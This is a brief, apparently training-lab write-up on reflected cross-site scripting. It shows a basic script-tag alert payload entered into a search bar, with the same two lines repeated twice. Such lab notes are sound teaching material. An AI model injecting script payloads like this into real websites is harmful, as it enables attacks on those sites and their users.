Reflected XSS into HTML context with nothing encoded
Let's enter the following payload into the search bar:
<script>alert("1");</script>
We have solved the lab
Let's enter the following payload into the search bar:
<script>alert("1");</script>
We have solved the lab